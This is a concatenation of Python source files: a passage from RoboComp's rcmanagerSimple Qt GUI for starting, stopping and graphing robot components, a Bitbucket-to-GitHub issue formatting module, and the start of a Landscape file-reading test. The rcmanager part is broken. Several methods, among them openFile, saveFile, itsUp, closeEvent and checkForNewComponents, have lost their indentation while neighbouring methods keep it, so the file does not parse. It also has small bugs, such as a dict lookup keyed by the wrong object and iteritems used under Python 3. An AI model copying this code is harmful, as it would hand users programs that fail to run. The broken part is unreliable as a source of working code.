        self.actionOpen = self.menuFile.addAction('Open')
        self.connect(self.actionOpen, QtCore.SIGNAL("triggered(bool)"), self.openFile)
        self.actionSave = self.menuFile.addAction('Save')
        self.connect(self.actionSave, QtCore.SIGNAL("triggered(bool)"), self.saveFile)
        self.actionEdit = self.menuFile.addAction('Edit')
        self.connect(self.actionEdit, QtCore.SIGNAL("triggered(bool)"), self.runEditor)
        self.actionDock = self.menuFile.addAction('Dock')
        self.connect(self.actionDock, QtCore.SIGNAL("triggered(bool)"), self.changeDock)
        self.actionExit = self.menuFile.addAction('Exit')
        self.connect(self.actionExit, QtCore.SIGNAL("triggered(bool)"), self.forceExit)
        # Do we want the eye-candy graph simulation?
        if (dict['active'] == "true"):
            self.doSimulation = True
        else:
            self.doSimulation = False
        if self.doSimulation == True:
            self.actionSS = self.menuSim.addAction('Stop')
        else:
            self.actionSS = self.menuSim.addAction('Start')
        # Set connections
        self.connect(self.ui.checkList, QtCore.SIGNAL("itemClicked(QListWidgetItem *)"), self.selectCheck)
        self.connect(self.ui.upButton, QtCore.SIGNAL("clicked()"), self.up)
        self.connect(self.ui.downButton, QtCore.SIGNAL("clicked()"), self.down)
        # self.connect(self.ui.restartButton, QtCore.SIGNAL("clicked()"), self.restart)
        self.connect(self.ui.tabWidget, QtCore.SIGNAL("currentChanged(int)"), self.tabChanged)
        self.connect(self.timer, QtCore.SIGNAL("timeout()"), self.checkAll)
        self.connect(self.canvas, QtCore.SIGNAL('upRequest()'), self.manageGraphUp)
        self.connect(self.canvas, QtCore.SIGNAL('downRequest()'), self.manageGraphDown)
        self.connect(self.canvas, QtCore.SIGNAL('restartRequest()'), self.manageGraphRestart)
        self.connect(self.canvas, QtCore.SIGNAL('configRequest()'), self.manageGraphConfig)
        self.connect(self.actionSS, QtCore.SIGNAL("triggered(bool)"), self.sSimulation)
        # Draw the graph
        self.canvas.update()
        # Get settings
        # NOTE(review): restore window geometry, selected tab and docking
        # preference; any failure falls through silently to defaults.
        try:
            settings = QtCore.QSettings("RoboComp", "rcmanager")
            value = QtCore.QByteArray(settings.value("geometry"))
            if value != None:
                self.restoreGeometry(value)
            value = int(settings.value("page"))
            if value != None:
                self.ui.tabWidget.setCurrentIndex(value)
            value = bool(settings.value("docking"))
            if value != None:
                if value == True:
                    self.changeDock()
        except:
            print("Could not read preferred settings")
# Select a new rcmanager configuration file
def openFile(self, path=None):
if path is None or path is False:
self.configFile = QtGui.QFileDialog.getOpenFileName(self, "Select file", '', "*.xml")[0]
else:
self.configFile = path
if len(self.configFile) > 0:
if self.canvas.ui != None: self.canvas.ui.close()
self.readConfig()
else:
print ('len(cfgFile) == 0')
# Save the current configuration to a new file
def saveFile(self):
global dict
if self.canvas.ui != None: self.canvas.ui.close()
s = QtGui.QFileDialog.getSaveFileName (self, "Select output file",'', "*.xml")
if len(s) > 0 and len(s[0])>0:
for c1 in self.compConfig:
for c2 in self.canvas.compList:
if c1.alias == c2.name:
c1.x = c2.x
c1.y = c2.y
c1.r = c2.r
rcmanagerConfigSimple.writeConfigToFile(dict, self.compConfig, s[0])
# Dock icon blinking method.
    def changeDock(self):
        """Toggle system-tray docking: create/destroy the tray icon and the
        blink-timer connection, and flip the menu label accordingly."""
        global dict
        if self.canvas.ui != None: self.canvas.ui.close()
        if self.doDock == False:
            self.systray = QtWidgets.QSystemTrayIcon(self)
            self.systray.setIcon(self.iconOK)
            self.systray.setVisible(True)
            self.connect(self.systray, QtCore.SIGNAL("activated (QSystemTrayIcon::ActivationReason)"), self.toggle)
            self.connect(self.blinkTimer, QtCore.SIGNAL("timeout()"), self.changeIcon)
            self.iconNumber = 0
            self.doDock = True
            dict['dock'] = 'true'
            self.actionDock.setText('Undock')
        else:
            self.systray.deleteLater()
            self.disconnect(self.blinkTimer, QtCore.SIGNAL("timeout()"), self.changeIcon)
            self.iconNumber = 0
            self.doDock = False
            dict['dock'] = 'false'
            self.actionDock.setText('Dock')
# Stop graph simulation if its running or vice versa.
    def sSimulation(self):
        """Toggle the graph layout simulation on/off, updating the menu
        label, the canvas timer period and the persisted setting."""
        global dict
        self.doSimulation = not self.doSimulation
        if self.doSimulation == False:
            self.actionSS.setText('Start')
            if self.fastState == False:
                self.canvasTimer.start(dict['focustime'])
            dict['active'] = 'false'
        else:
            self.actionSS.setText('Stop')
            self.setFastState()
            if self.fastState == False:
                self.canvasTimer.start(dict['idletime'])
            dict['active'] = 'true'
# When doing simulation calling this method will make the simulation go fast
    def setFastState(self, fast=True):
        """Switch the layout timers: 'fast' runs the simulation at a high
        rate for a short burst (after a node drag); otherwise fall back to
        the focus/idle period depending on the visible tab."""
        global dict
        self.fastState = fast
        if fast:
            self.canvasTimer.start(dict['fasttime'])
            self.canvasFastTimer.start(dict['fastperiod'])
        else:
            self.canvasFastTimer.stop()
            if self.ui.tabWidget.currentIndex() == 1 and self.doSimulation == True:
                self.canvasTimer.start(dict['focustime'])
            else:
                self.canvasTimer.start(dict['idletime'])
    # Opposite of the previous method
    def graphFastEnds(self):
        """Fast-timer slot: drop back to the normal simulation rate."""
        self.setFastState(False)
# Run component simulator
def runEditor(self):
if self.canvas.ui != None: self.canvas.ui.close()
self.editor = rcmanagerEditor.rcmanagerEditorWidget()
self.editor.setModal(True)
self.editor.show()
self.editor.readConfig(self.configFile)
self.connect(self.editor, QtCore.SIGNAL('finished()'), self.readConfig)
# Add the ui-selected component to the requests set by calling the 'up()' method.
    def manageGraphUp(self):
        """Canvas 'upRequest' slot: select the requested component in the
        list, then queue it to be started."""
        for idx in range(self.ui.checkList.count()):
            if self.ui.checkList.item(idx).text() == self.canvas.request:
                self.ui.checkList.setCurrentRow(idx)
                self.selectCheck()
                self.up()
                break
    # Add the ui-selected component to the down set by calling the 'down()' method.
    def manageGraphDown(self):
        """Canvas 'downRequest' slot: select the requested component, then
        run its shutdown command."""
        for idx in range(self.ui.checkList.count()):
            if self.ui.checkList.item(idx).text() == self.canvas.request:
                self.ui.checkList.setCurrentRow(idx)
                self.selectCheck()
                self.down()
                break
    def manageGraphRestart(self):
        """Canvas 'restartRequest' slot: bring the component down, then
        queue it up again."""
        for idx in range(self.ui.checkList.count()):
            if self.ui.checkList.item(idx).text() == self.canvas.request:
                self.ui.checkList.setCurrentRow(idx)
                self.selectCheck()
                self.down()
                self.up()
                break
    # Edit a component's configuration
    def manageGraphConfig(self):
        """Canvas 'configRequest' slot: open the component's config file."""
        for idx in range(self.ui.checkList.count()):
            if self.ui.checkList.item(idx).text() == self.canvas.request:
                self.ui.checkList.setCurrentRow(idx)
                self.selectCheck()
                self.config()
                break
# Update the UI graph
    def graphUpdate(self):
        """Timer slot: sync nodes with the config, recenter, advance the
        physics simulation (if enabled) and repaint the canvas."""
        global dict
        self.canvas.checkForNewComponents(self)
        self.canvas.center()
        if self.doSimulation:
            self.canvas.step(self)
        self.canvas.update()
    # Current tab changed
    @QtCore.Slot("int")
    def tabChanged(self, num):
        """Pick the idle or focus timer period depending on which tab is shown."""
        if self.fastState == False:
            if num == 0: self.canvasTimer.start(dict['idletime'])
            elif num == 1 and self.doSimulation == True: self.canvasTimer.start(dict['focustime'])
# Retuns True if the specified component is up, otherwise returns False
def itsUp(self, compNumber):
if self.compConfig[compNumber].alias in self.componentChecker:
return self.componentChecker[self.compConfig[compNumber]].isalive()
return False
# Queues the user's request to change the state of a given component, turning it off if it's on and viceversa.
    def switchComponent(self, compNumber):
        """Flip the state of the component at *compNumber*: stop it if it is
        running, otherwise queue it to start."""
        if self.itsUp(compNumber) == True: self.down()
        else: self.up()
    # Queues the user request to turn on a component
    def up(self):
        """Queue the currently selected component for start-up; upRequests()
        launches it once its dependencies are alive."""
        itsconfig = self.compConfig[self.ui.checkList.currentRow()]
        self.requests = self.requests | set([itsconfig.alias])
        self.clearFocus()
    # Queues the user request to turn on a component
    def up_by_name(self, name):
        """Select the component called *name* in the list and queue it up."""
        for idx in range(self.ui.checkList.count()):
            if self.ui.checkList.item(idx).text() == name:
                self.ui.checkList.setCurrentRow(idx)
                self.selectCheck()
                self.up()
                break
    # Queues the user request to turn off a component
    def down(self):
        """Run the shutdown command shown in the UI for the selected component."""
        self.bg_exec(str(self.ui.downEdit.text()), self.ui.wdEdit.text())
        self.clearFocus()
    def killall(self):
        """Run the shutdown command of every configured component."""
        for info in self.compConfig:
            self.bg_exec(str(info.compdown), str(info.workingdir))
def restart(self):
self.request = self.compList[self.ui.idx].name
self.ui.close()
self.emit(QtCore.SIGNAL("restartRequest()"))
# Run the configured file editor
    def config(self):
        """Open the selected component's config file with the configured editor command."""
        global dict
        self.bg_exec(self.compConfig[self.ui.checkList.currentRow()].configFile, self.ui.wdEdit.text())
        self.clearFocus()
# Reads new configuration from file
    def readConfig(self):
        """Reload self.configFile: reset UI state, rebuild the component
        list and spawn one ComponentChecker per endpoint."""
        self.canvas.initialize()
        self.ui.checkList.clear()
        self.compConfig = []
        self.back_comps = set()
        self.requests = set()
        newList, newDict = rcmanagerConfigSimple.getConfigFromFile(self.configFile)
        # Merge the file's global options into the module-level defaults.
        for k, v in newDict.items():
            dict[k] = v
        self.componentChecker.clear()
        for listItem in newList:
            item = QtWidgets.QListWidgetItem()
            item.setText(listItem.alias)
            self.ui.checkList.insertItem(0, item)
            self.compConfig.insert(0, listItem)
            self.componentChecker[listItem.alias] = ComponentChecker(listItem.endpoint)
            self.componentChecker[listItem.alias].runrun()
        self.log('Configuration loaded')
        # Warn if the dependency graph is split into disconnected groups.
        n = rcmanagerConfigSimple.unconnectedGroups(newList)
        if n > 1:
            msg = 'WARNING: ' + str(n) + ' unconnected component groups'
            self.log(msg)
            QtWidgets.QMessageBox.warning(self, 'Warning', msg)
        self.setFastState()
# Call-back when
#
    def selectCheck(self):
        """List-click slot: count consecutive clicks on the same row (a
        'switch'-fold click toggles the component) and show its details."""
        # Check if it's a consecutive click
        notTheLastOneAtTime = 0
        if self.clickNumber != self.ui.checkList.currentRow():
            notTheLastOneAtTime = 1
        if self.lastClickTime.elapsed() > dict['interval']:
            notTheLastOneAtTime = 1
        if notTheLastOneAtTime == 0:  # It's not
            self.clickTimes = self.clickTimes + 1
        else:  # It is
            self.clickTimes = 1
            self.clickNumber = self.ui.checkList.currentRow()
        self.lastClickTime = self.lastClickTime.currentTime()
        # If it's a N-ary click: swap its state
        if self.clickTimes >= dict['switch']:
            self.switchComponent(self.clickNumber)
        # Show information of the last clicked component
        info = self.compConfig[self.ui.checkList.currentRow()]
        self.ui.checkEdit.setText(info.endpoint)
        self.ui.wdEdit.setText(info.workingdir)
        self.ui.upEdit.setText(info.compup)
        self.ui.downEdit.setText(info.compdown)
        self.ui.cfgEdit.setText(info.configFile)
    def checkAll(self, initial=False):
        """Periodic timer slot: colour each list entry by liveness, log
        state transitions, refresh the tray icon and flush queued starts."""
        allOk = True
        workingComponents = set()
        for numItem in range(0, len(self.compConfig)):
            ok = True
            itemConfig = self.compConfig[numItem]
            item = self.ui.checkList.item(numItem)
            if (itemConfig.alias in self.componentChecker) and (self.componentChecker[itemConfig.alias].isalive()):
                item.setForeground(QtGui.QColor(0, 255, 0))
                workingComponents.add(itemConfig.alias)
            else:
                item.setForeground(QtGui.QColor(255, 0, 0))
                allOk = False
        # Only log / blink when the set of live components changed.
        if workingComponents != self.back_comps:
            if allOk == False:
                self.blinkTimer.stop()
                self.blinkTimer.start(dict['blink'])
            for comp in workingComponents.difference(self.back_comps):
                self.log('Now \"' + comp + '\" is up.')
            for comp in self.back_comps.difference(workingComponents):
                self.log('Now \"' + comp + '\" is down.')
        if self.wantsDocking():
            if allOk and len(self.compConfig) > 0:
                self.systray.setIcon(self.iconFULL)
            elif workingComponents != self.back_comps:
                self.systray.setIcon(self.iconOK)
        self.back_comps = workingComponents.copy()
        self.upRequests()
    def upRequests(self):
        """Launch every queued component whose dependencies are all alive;
        components with missing dependencies stay queued and their
        dependencies are queued as well."""
        future_requests = self.requests
        for alias in self.requests:
            itsconfig = self.getConfigByAlias(alias)
            unavailableDependences = []
            for dep in itsconfig.dependences:
                if (not dep in self.componentChecker) or (not self.componentChecker[dep].isalive()):
                    unavailableDependences.append(dep)
            if len(unavailableDependences) == 0:
                print ('rcmanager:', alias, 'is now ready to run.')
                self.upConfig(itsconfig)
                future_requests = future_requests - set([alias])
            else:
                print ('rcmanager:', alias, 'has unavailable dependences:', unavailableDependences)
                future_requests = future_requests | set(unavailableDependences)
        self.requests = future_requests
# Tries to execute a component
    def upConfig(self, conf):
        """Launch the component described by *conf* (its 'up' command, run
        from its working directory)."""
        self.bg_exec(conf.compup, conf.workingdir)
# Executes a command in the background
    def bg_exec(self, command, workDir):
        """Run *command* detached in *workDir*, restoring the previous cwd.

        NOTE(review): the command is split on single spaces, so quoted
        arguments or paths with spaces are not supported.
        """
        # Get command argument list
        argument_list = command.split(' ')
        # Set program as argument_list[0]
        program = argument_list[0]
        # Set args as argument_list[1, -1]
        args = argument_list[1:]
        currentWorkDir = os.getcwd()
        os.chdir(workDir)
        proc = QtCore.QProcess()
        print ('\nQProcess::startDetached( ' + program + ' , ' + str(args) + ' ) @ ' + os.getcwd() + '\n')
        proc.startDetached(program, args)
        os.chdir(currentWorkDir)
#
# Changes the icon of the program properly, skipping if docking is not active
    def changeIcon(self):
        """Blink-timer slot: alternate the two tray icons while the window
        is not focused; stop blinking once it regains focus."""
        if self.isActiveWindow() == True:
            self.blinkTimer.stop()
            self.systray.setIcon(self.iconOK)
        else:
            if self.iconNumber == 0:
                self.systray.setIcon(self.iconChange1)
                self.iconNumber = 1
            elif self.iconNumber == 1:
                self.systray.setIcon(self.iconChange2)
                self.iconNumber = 2
            else:
                self.systray.setIcon(self.iconChange1)
                self.iconNumber = 1
#
# (Un)hide the main window
def toggle(self):
if self.isVisible(): self.hide()
else: self.show()
#
# Manages close events
def closeEvent(self, closeevent):
settings = QtCore.QSettings("RoboComp", "rcmanager");
g = self.saveGeometry()
settings.setValue("geometry", g)
settings.setValue("page", self.ui.tabWidget.currentIndex())
settings.setValue("docking", self.wantsDocking())
if self.doExit != 1 and self.doDock == True:
closeevent.ignore()
self.hide()
elif self.wantsDocking():
closeevent.accept()
for key, checker in self.componentChecker.iteritems():
checker.stop()
# else:
# closeevent.accept()
# self.forceExit()
# sys.exit(0)
#
# Forces the program to exit
    def forceExit(self):
        """Menu 'Exit' slot: bypass the dock-to-tray behaviour and really close."""
        self.doExit = 1
        self.close()
    #
    # Clears the interface selection when the user presses 'Esc'
    def keyPressEvent(self, keyevent):
        """Esc clears the list selection and closes any open node dialog."""
        if keyevent.key() == 16777216:  # 0x01000000 == Qt.Key_Escape
            self.ui.checkList.clearSelection()
            if self.canvas.ui != None: self.canvas.ui.close()
#
# Interface stuff:
    def uiChange(self):
        """Select the first list entry, refresh its details, then clear focus."""
        self.ui.checkList.setCurrentRow(0)
        self.selectCheck()
        self.clearFocus()
    def clearFocus(self):
        """Deselect everything in the component list."""
        self.ui.checkList.clearSelection()
    def log(self, text):
        """Append a timestamped line to the output pane."""
        self.ui.outputText.append(' * ' + QtCore.QTime.currentTime().toString() + ': ' + text)
    def getConfigByAlias(self, alias):
        """Return the component config whose alias matches, or None."""
        for config in self.compConfig:
            if config.alias == alias:
                return config
        return None
#
# Return 1 if docking is selected, 0 otherwise.
    def wantsDocking(self):
        """Return 1 when tray docking is active, 0 otherwise."""
        if self.doDock == True: return 1
        else: return 0
def resizeEvent(self, e):
old = e.oldSize()
new = e.size()
inc = new - old
if (inc.width != 0 or inc.height!=0):
self.canvas.resize(self.canvas.size()+inc)
e.accept()
class GraphNode:
    """One drawable node of the component graph.

    Carries identity/appearance (name, colours, dependency aliases, alive
    flag) and the state used by the force-directed layout (position,
    radius, velocity).
    """
    def __init__(self):
        # Identity and appearance.
        self.name, self.deps = '', []
        self.color = self.htmlcolor = None
        self.on = False
        # Layout simulation state.
        self.x = self.y = 0.
        self.vel_x = self.vel_y = 0.
        self.r = 10.
class GraphView(QtWidgets.QWidget):
    """Widget that draws the component dependency graph and runs a small
    force-directed layout; nodes can be dragged and right-clicked."""
    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        # Parent tab is kept to compute the drawing origin (its center).
        self.tab = parent
        self.initialize()
    def initialize(self):
        """Reset all view state and reload the physics constants from the
        global settings dict."""
        global dict
        self.compList = []
        # Node currently being dragged with the mouse (None when idle).
        self.VisualNodeCogia = None
        self.ox = 0
        self.oy = 0
        self.ui = None
        #self.hookes_constant = dict['hookes']
        self.spring_length = dict['springlength']
        self.roza = 1.-dict['friction']
        self.time_elapsed2 = dict['step']**2
        self.field_force_multiplier = dict['fieldforce']
        self.hookes_constant = dict['hookes']
def nodes(self):
if self.VisualNodeCogia:
return self.compList + list(self.VisualNodeCogia)
else:
return self.compList
def checkForNewComponents(self, parent):
# Check for components added to the configuration
anyone = False
for parentComp in parent.compConfig:
notFound = True
if self.VisualNodeCogia:
if self.VisualNodeCogia.name == parentComp.alias:
if self.VisualNodeCogia.name in parent.componentChecker:
notFound = False
self.VisualNodeCogia.on = parent.componentChecker[self.VisualNodeCogia.name].isalive()
break
if notFound:
for myComp in self.compList:
if myComp.name == parentComp.alias:
notFound = False
myComp.on = parent.componentChecker[myComp.name].isalive()
break
if notFound:
newOne = GraphNode()
newOne.color = parentComp.color
newOne.htmlcolor = parentComp.htmlcolor
newOne.name = parentComp.alias
newOne.deps = parentComp.dependences
newOne.x = float(parentComp.x)
newOne.y = float(parentComp.y)
newOne.r = float(parentComp.r)
self.compList.append(newOne)
anyone = True
#if anyone == True: self.step(self)
    def step(self, parent):
        """Advance the force-directed layout one tick: apply pairwise
        repulsion plus spring attraction along dependency edges to each
        node's velocity, then integrate positions."""
        #
        # Compute velocities
        for iterr in self.compList:
            force_x = force_y = 0.
            for iterr2 in self.compList:
                if iterr.name == iterr2.name: continue
                ix = iterr.x - iterr2.x
                iy = iterr.y - iterr2.y
                # Jitter coincident nodes apart so atan2/repulsion are defined.
                while ix == 0 and iy == 0:
                    iterr.x = iterr.x + random.uniform( -10, 10)
                    iterr2.x = iterr2.x + random.uniform(-10, 10)
                    iterr.y = iterr.y + random.uniform( -10, 10)
                    iterr2.y = iterr2.y + random.uniform(-10, 10)
                    ix = iterr.x - iterr2.x
                    iy = iterr.y - iterr2.y
                angle = math.atan2(iy, ix)
                dist2 = ((abs((iy*iy) + (ix*ix))) ** 0.5) ** 2.
                if dist2 < self.spring_length: dist2 = self.spring_length
                # Repulsive field decays with squared distance.
                force = self.field_force_multiplier / dist2
                force_x += force * math.cos(angle)
                force_y += force * math.sin(angle)
            for iterr2 in self.compList:
                if iterr2.name in iterr.deps or iterr.name in iterr2.deps:
                    ix = iterr.x - iterr2.x
                    iy = iterr.y - iterr2.y
                    angle = math.atan2(iy, ix)
                    force = math.sqrt(abs((iy*iy) + (ix*ix))) # force means distance actually
                    #if force <= self.spring_length: continue # "
                    force -= self.spring_length # force means spring strain now
                    force = force * self.hookes_constant # now force means force :-)
                    force_x -= force*math.cos(angle)
                    force_y -= force*math.sin(angle)
            # Integrate acceleration and apply friction ('roza').
            iterr.vel_x = (iterr.vel_x + (force_x*self.time_elapsed2))*self.roza
            iterr.vel_y = (iterr.vel_y + (force_y*self.time_elapsed2))*self.roza
        # Update positions
        for iterr in self.compList:
            iterr.x += iterr.vel_x
            iterr.y += iterr.vel_y
    def center(self):
        """Translate all nodes (including the dragged one) so their centroid
        sits at the widget origin."""
        total = 0
        totalx = 0.
        totaly = 0.
        for iterr in self.compList:
            totalx += iterr.x
            totaly += iterr.y
            total += 1
        if self.VisualNodeCogia:
            totalx += self.VisualNodeCogia.x
            totaly += self.VisualNodeCogia.y
            total += 1
        if abs(totalx) > 0.001:
            meanx = totalx / total
            for iterr in self.compList:
                iterr.x -= meanx
            if self.VisualNodeCogia:
                self.VisualNodeCogia.x -= meanx
        if abs(totaly) > 0.001:
            meany = totaly / total
            for iterr in self.compList:
                iterr.y -= meany
            if self.VisualNodeCogia:
                self.VisualNodeCogia.y -= meany
    def paintNode(self, node):
        """Draw one node: green when alive, red when down, its label above,
        and a small user-colour badge in the middle when configured."""
        w2 = self.parent().width()/2
        h2 = self.parent().height()/2+30
        global dict
        if node.on:
            self.painter.setBrush(QtGui.QColor(0, 255, 0, dict['alpha']))
            self.painter.setPen(QtGui.QColor(0, 255, 0))
        else:
            self.painter.setBrush(QtGui.QColor(255, 0, 0, dict['alpha']))
            self.painter.setPen(QtGui.QColor(255, 0, 0))
        self.painter.drawEllipse(node.x-node.r+w2, node.y-node.r+h2, node.r*2, node.r*2)
        self.painter.drawText(QtCore.QPoint(node.x-node.r+w2, node.y-node.r-3+h2), node.name)
        if node.color != None:
            self.painter.setBrush(node.color)
            self.painter.setPen(node.color)
            self.painter.drawEllipse(node.x-node.r/4+w2, node.y-node.r/4+h2, node.r/2, node.r/2)
    def paintEvent(self, event):
        """Render the graph: blue dependency edges with arrow pies first,
        then every node on top."""
        w2 = self.tab.width()/2
        h2 = self.tab.height()/2+30
        nodosAPintar = [] + self.compList
        if self.VisualNodeCogia: nodosAPintar.append(self.VisualNodeCogia)
        self.painter = QtGui.QPainter(self)
        self.painter.setRenderHint(QtGui.QPainter.Antialiasing, True)
        for i in nodosAPintar:
            xo = i.x
            yo = i.y
            for j in nodosAPintar:
                if j.name in i.deps:
                    # Edge angle in degrees (57.2957795 = 180/pi) and the
                    # unit vector from i to j; the line starts/stops at the
                    # circle borders rather than the centers.
                    angle = 180.-(math.atan2(yo-j.y, xo-j.x)*(57.2957795))
                    xinc = j.x - i.x
                    yinc = j.y - i.y
                    mag = ( xinc**2. + yinc**2. )**0.5
                    if mag == 0: continue
                    xshift = (xinc/mag)
                    yshift = (yinc/mag)
                    xinit = i.x+xshift*i.r
                    yinit = i.y+yshift*i.r
                    xend = xinit+((mag-i.r-j.r)*math.cos(angle*(math.pi/180.)))
                    yend = yinit-((mag-i.r-j.r)*math.sin(angle*(math.pi/180.)))
                    self.painter.setPen(QtGui.QColor(0, 0, 255, 150))
                    self.painter.drawLine(xinit+w2, yinit+h2, xend+w2, yend+h2)
                    self.painter.setBrush(QtGui.QColor(0, 0, 255, 200))
                    #-j.r-(xshift/i.r)*j.r,
                    #-j.r-(yshift/i.r)*j.r
                    # Arrow head drawn as a narrow pie at the target border.
                    px = j.x-10-xshift*j.r
                    py = j.y-10-yshift*j.r
                    self.painter.drawPie(px+w2, py+h2, 20, 20, abs((angle+180-16)*16), 32*16)
        self.painter.setFont(QtGui.QFont("Arial", 13));
        for i in self.compList:
            self.paintNode(i)
        if self.VisualNodeCogia:
            self.paintNode(self.VisualNodeCogia)
        self.painter = None
    def mousePressEvent(self, e):
        """Single click: hit-test nodes (may start a drag or open the menu)."""
        self.showNodeMenu(e)
    def mouseDoubleClickEvent(self, e):
        """Double click: always open the command dialog on the hit node."""
        self.showNodeMenu(e, True)
    def showNodeMenu(self, e, forceDialog=False):
        """Hit-test the click against the node circles; a right click (or
        forceDialog) opens the CommandDialog for the closest hit node, a
        left click picks it up for dragging."""
        w2 = self.parent().width()/2
        h2 = self.parent().height()/2 + 30
        # Translate widget coordinates into graph coordinates.
        x = e.x()-w2
        y = e.y()-h2
        if self.ui: self.ui.close()
        VisualNode = None
        minDist = -1.
        minIndex = 0
        for b in self.compList:
            bx = b.x
            by = b.y
            dist = ( (bx-x)**2 + (by-y)**2 )**0.5
            if dist < b.r:
                if dist < minDist or minDist == -1.:
                    VisualNode = b
                    minDist = dist
                    minIndex = self.compList.index(b)
                    # Remember the click offset within the node for dragging.
                    self.ox = x - b.x
                    self.oy = y - b.y
        if VisualNode:
            if e.button() == 2 or forceDialog:
                self.ui = CommandDialog(self, self.compList[minIndex].x+w2, self.compList[minIndex].y+h2)
                self.ui.idx = minIndex
                self.connect(self.ui, QtCore.SIGNAL('up()'), self.up)
                self.connect(self.ui, QtCore.SIGNAL('down()'), self.down)
                self.connect(self.ui, QtCore.SIGNAL('restart()'), self.restart)
                self.connect(self.ui, QtCore.SIGNAL('config()'), self.config)
                self.ui.show()
            elif e.button() == 1:
                self.VisualNodeCogia = self.compList.pop(minIndex)
                self.repaint()
    def mouseReleaseEvent(self, e):
        """Drop the dragged node back into the list and trigger the fast
        simulation burst via the nodeReleased signal."""
        if self.VisualNodeCogia != None:
            self.compList.append(self.VisualNodeCogia)
            self.VisualNodeCogia = None
            self.emit(QtCore.SIGNAL("nodeReleased()"))
    def mouseMoveEvent(self, e):
        """While dragging, move the picked node with the cursor (keeping the
        original click offset) and repaint."""
        w2 = self.parent().width()/2
        h2 = self.parent().height()/2+30
        self.repaint()
        if self.VisualNodeCogia != None:
            self.VisualNodeCogia.x = e.x()-self.ox-w2
            self.VisualNodeCogia.y = e.y()-self.oy-h2
            self.repaint()
    def up(self):
        """CommandDialog 'up' slot: record the target node and forward the
        request to TheThing via the upRequest signal."""
        self.request = self.compList[self.ui.idx].name
        self.ui.close()
        self.emit(QtCore.SIGNAL("upRequest()"))
    def down(self):
        """CommandDialog 'down' slot: record the target node and emit downRequest."""
        self.request = self.compList[self.ui.idx].name
        self.ui.close()
        self.emit(QtCore.SIGNAL("downRequest()"))
    def restart(self):
        """CommandDialog 'restart' slot: record the target node and emit restartRequest."""
        self.request = self.compList[self.ui.idx].name
        self.ui.close()
        self.emit(QtCore.SIGNAL("restartRequest()"))
    def config(self):
        """CommandDialog 'edit config' slot: record the target node and emit configRequest."""
        self.request = self.compList[self.ui.idx].name
        self.emit(QtCore.SIGNAL("configRequest()"))
        self.ui.close()
#
# Create the Qt application, the class, and runs the program
#
# Entry point: build the Qt application and main dialog, load the config
# file given on the command line, optionally start a component and/or run
# hidden, then hand control to the Qt event loop.
if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    window = TheThing()
    parser = argparse.ArgumentParser()
    parser.add_argument('input_file')
    parser.add_argument('-u', "--up", dest='up')
    parser.add_argument('--hide', action='store_true')
    args = parser.parse_args()
    if args.input_file:
        window.openFile(args.input_file)
    else:
        print('input file needed to start rcmanager')
    if args.up:
        window.up_by_name(args.up)
    ret = -1
    if not args.hide:
        window.show()
    try:
        ret = app.exec_()
    except Exception:
        traceback.print_exc()
        print('Some error happened.')
    # BUG FIX: sys.exit() with no argument always exited with status 0,
    # discarding both Qt's return code and the -1 failure marker.
    sys.exit(ret)
| Kmayankkr/robocomp | tools/rcmanagerSimple/rcmanagersimple.py | Python | gpl-3.0 | 30,207 |
# Markdown templates used when re-creating bitbucket issues/comments on
# GitHub; filled in via str.format by format_body() / format_comment().
ISSUE = """\
- Bitbucket: https://bitbucket.org/{repo}/issue/{id}
- Originally reported by: {user}
- Originally created at: {created_on}
{body}
"""
COMMENT = """Original comment by {user}
{body}"""
def format_user(user_data, usermap):
    """Render a bitbucket user record as markdown.

    Returns '@<github-login>' when the username has a truthy entry in
    *usermap* (a string entry is used as the GitHub login, any other
    truthy value keeps the bitbucket name), a bitbucket profile link for
    unmapped users, and "Anonymous" when there is no user at all.
    """
    if user_data is None:
        return "Anonymous"
    assert isinstance(user_data, dict), user_data
    username = user_data.get('username')
    mapped = usermap.get(username)
    if mapped not in (None, False):
        return '@' + (mapped if isinstance(mapped, str) else username)
    if username is not None:
        return '[{0}](http://bitbucket.org/{0})'.format(
            username
        )
    # BUG FIX: previously fell through and implicitly returned None for
    # records without a username; treat them like a missing user record.
    return "Anonymous"
def format_body(issue, repo, usermap):
    """Render a bitbucket issue dict as the markdown body of a GitHub issue."""
    cleaned = clean_body(issue['content'], usermap)
    reporter = format_user(issue.get('reported_by'), usermap)
    return ISSUE.format(
        body=cleaned,
        repo=repo,
        id=issue['local_id'],
        user=reporter,
        created_on=issue['created_on'],
    )
def format_comment(comment, usermap):
    """Render a comment dict through the COMMENT template.

    NOTE(review): this assumes *comment* already carries pre-formatted
    'user' and 'body' keys; 'usermap' is unused here -- confirm against
    the caller.
    """
    return COMMENT.format(**comment)
def clean_body(body, usermap):
    """Convert bitbucket/creole {{{ }}} code markers into markdown.

    Multi-line {{{ ... }}} blocks become 4-space indented code lines;
    inline markers become backticks.
    NOTE(review): 'usermap' is currently unused here.
    """
    lines = []
    in_block = False
    for line in body.splitlines():
        if line.startswith("{{{") or line.startswith("}}}"):
            if "{{{" in line:
                before, part, after = line.partition("{{{")
                lines.append('    ' + after)
                in_block = True
            if "}}}" in line:
                before, part, after = line.partition("}}}")
                lines.append('    ' + before)
                in_block = False
        else:
            if in_block:
                lines.append("    " + line)
            else:
                lines.append(line.replace("{{{", "`").replace("}}}", "`"))
    return "\n".join(lines)
| RonnyPfannschmidt/bitbucket_issue_migration | src/migrate_to_github/formating.py | Python | gpl-3.0 | 1,727 |
# -*- coding: utf-8 -*-
import codecs
import os
from mock import patch
import time
import unittest
from twisted.python.compat import long
from landscape.lib import testing
from landscape.lib.fs import append_text_file, append_binary_file, touch_file
from landscape.lib.fs import read_text_file, read_binary_file
class BaseTestCase(testing.FSTestCase, unittest.TestCase):
    """Shared base: filesystem helpers (makeFile/makeDir/assertFileContent)
    mixed into a standard unittest TestCase."""
    pass
class ReadFileTest(BaseTestCase):
    """Tests for read_binary_file() and read_text_file(), covering the
    limit parameter (positive = head, negative = tail) and decoding."""
    def test_read_binary_file(self):
        """
        With no options L{read_binary_file} reads the whole file passed as
        argument.
        """
        path = self.makeFile("foo")
        self.assertEqual(read_binary_file(path), b"foo")
    def test_read_binary_file_with_limit(self):
        """
        With a positive limit L{read_binary_file} reads up to L{limit} bytes
        from the start of the file.
        """
        path = self.makeFile("foo bar")
        self.assertEqual(read_binary_file(path, limit=3), b"foo")
    def test_read_binary_file_with_negative_limit(self):
        """
        With a negative limit L{read_binary_file} reads only the tail of the
        file.
        """
        path = self.makeFile("foo bar from end")
